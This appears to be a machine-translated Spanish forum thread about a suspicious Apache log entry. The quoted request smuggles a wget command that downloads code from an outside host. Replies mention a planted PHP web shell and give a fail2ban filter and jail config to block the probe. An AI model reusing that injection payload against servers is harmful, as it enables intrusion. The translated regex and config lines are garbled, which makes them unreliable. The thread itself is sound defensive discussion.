hoy recibí esto
16X.XXX.XX.77 - - [28/Jul/2014:--:--:--] "GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSpart3dns;wget%20proxypipe.com/apach0day; HTTP/1.0" 200 3596 "-" "chroot-apach0day"
así que con
HTTP_USER_AGENT: chroot-apach0day
REQUEST_URI: x0a/x04/x0a/x02/x06/x08/x09/cDDOSpart3dns;wget%20proxypipe.com/apach0day
aparece en el registro de acceso y parece sospechoso ... ¿Alguna idea sobre eso?
Proxypipe.com es alojado por Voxility S.R.L (AS39743) (AS3223). Se sabe que Voxility es una mala empresa de hospedaje al permitir el hospedaje de malware, enviar correo basura, ejecutar DDoS, etc. desde sus IP.
Es mejor bloquear todos sus rangos de IP, de lo contrario, es posible que esté lidiando con ataques DDoS. Experimenté esto todo el día antes.
Puede encontrar una lista de sus rangos de IP aquí Voxility (AS39743) y Voxility (AS3223)
Yo también tengo sondas similares. Sin embargo, tengo tres sondas diferentes, todas con cargas útiles diferentes. La ejecución de ls -a mostró un nuevo directorio llamado .ssh en mi raíz de documentos, con un archivo llamado notshell.php
Inmediatamente eliminé el directorio y destruí la instancia de DigitalOcean
Supongo que alguien está intentando crear algún tipo de ataque en los servidores
Aquí hay una solución rápida y sucia para bloquear usando fail2ban. (Si actualmente no usa fail2ban, busque en Google su sistema operativo).
Si tiene instalado fail2ban, vea más abajo. Tenga en cuenta que las ubicaciones de los archivos fail2ban pueden ser diferentes, dependiendo de su sistema operativo. El siguiente ejemplo es de un servidor Debian. Esta muestra no cubre los tiempos de prohibición, etc .-- solo cómo crear un filtro y agregarlo a jail.local. Hay muchos ejemplos de configuración fail2ban en google para múltiples sistemas.
Rápido y sucio (Debian Linux):
1) Cree un nuevo archivo apache-0day.conf en /etc/fail2ban/filter.d que contenga:
# Fail2Ban archivo de configuración
# Filtro limitado para detener los ataques de apach0day
[Definición]
Opción: failregex
# Notas: regex para coincidir con este tipo de solicitud:
# 162.253.66.77 - - [28 / Jul / 2014: 19: 02: 00 +0000] "GET /? x0a / x04 / x0a / x02 / x06 / x08 / x09 / cDDOSpart3dns; wget% 20proxypipe.com / apach0day; HTTP / 1.0 "200 359" - "" chroot-apach0day "
failregex = ^ -. "(GET | POST). \? proxypipe | apach0day. $
Opción: ignoreregex
Notas: expresiones regulares para ignorar. Si esta expresión regular coincide, la línea se ignora.
Valores: TEXTO
# ignoreregex =
2) Filtro de prueba con comando: fail2ban-regex /var/log/apache2/access.log /etc/fail2ban/filter.d/apache-0day.conf
3) Edita /etc/fail2banl/jail.local, para agregar esta cárcel:
[apache-0day]
enabled = true
puerto = http, https
filter = apache-0day
logpath = /var/log/apache*/*access.log
maxretry = 2
4) Pruebe la nueva configuración general (observe las ADVERTENCIAS y corríjalas, si es necesario): fail2ban-client -d
5) Reinicie fail2ban: /etc/init.d/fail2ban restart
Lea otras preguntas en las etiquetas apache